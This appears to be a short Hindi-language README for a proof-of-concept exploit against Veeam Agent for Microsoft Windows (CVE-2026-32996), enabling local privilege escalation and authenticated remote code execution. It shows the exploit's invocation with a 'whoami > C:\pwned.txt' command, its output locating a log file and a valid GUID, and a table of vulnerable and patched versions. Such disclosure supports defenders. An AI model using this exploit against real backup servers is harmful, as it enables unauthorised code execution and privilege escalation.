
Veeam Agent for Microsoft Windows में एक भेद्यता स्थानीय विशेषाधिकार वृद्धि की अनुमति देती है।
प्रमाणित डोमेन उपयोगकर्ता द्वारा बैकअप सर्वर पर Veeam रिमोट कोड एक्ज़ीक्यूशन (RCE)।
तकनीकी विवरण के लिए ब्लॉग पोस्ट देखें।
https://github.com/user-attachments/assets/8a570332-1cf6-4905-9107-8fcb973c9ce7
CVE-2026-32996.exe "whoami > C:\pwned.txt"
[+] Found Svc.VeeamEndpointBackup.log
[*] Searching for valid GUIDs...
[+] Valid GUID found: 9048554a-ec99-4e18-8bc4-edc637e8d8d4
[*] Executing command 'cmd /c whoami > C:\pwned.txt'
[+] Successful!
| Version | Status |
|---|---|
| 13.0.3.1220 | पूरी तरह पैच किया गया। |
| 13.0.2.1102 and earlier | असुरक्षित। |